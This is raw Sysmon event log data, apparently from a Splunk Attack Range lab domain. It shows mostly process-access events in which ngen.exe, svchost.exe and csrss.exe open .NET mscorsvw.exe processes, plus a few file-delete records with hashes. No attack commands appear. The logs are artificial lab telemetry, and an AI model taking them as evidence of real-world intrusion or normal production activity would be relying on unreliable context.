\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.388{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-EE0E-00000000BB01}2076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.372{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-EE0E-00000000BB01}2076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.372{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-EE0E-00000000BB01}2076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-ED0E-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.075{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-ED0E-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.075{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-ED0E-00000000BB01}6896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC29-607E-EC0E-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.044{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC29-607E-EC0E-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:49.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC29-607E-EC0E-00000000BB01}6000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050592Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:49.330{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EAA142A8C1AC963BDFA65373160344F,SHA256=9EDEDAB131911FC4DF81BCA5339EFA6290604F16077609A309CA23A5BFE3FF9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.997{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-FD0E-00000000BB01}6036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.981{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-FD0E-00000000BB01}6036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-FC0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.919{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-FC0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-FC0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.888{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-FB0E-00000000BB01}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.888{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-FB0E-00000000BB01}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-FB0E-00000000BB01}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.872{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7746.tmpMD5=9E936C2078B286132CD6B9C8602FD17A,SHA256=FA994BADB1E90B2629E0D955572CA57EFE97169D20D6B4957E2F830E3680DA9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.841{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-FA0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.841{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-FA0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.841{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2A-607E-FA0E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.810{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2A-607E-F90E-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.794{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2A-607E-F90E-00000000BB01}4380C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 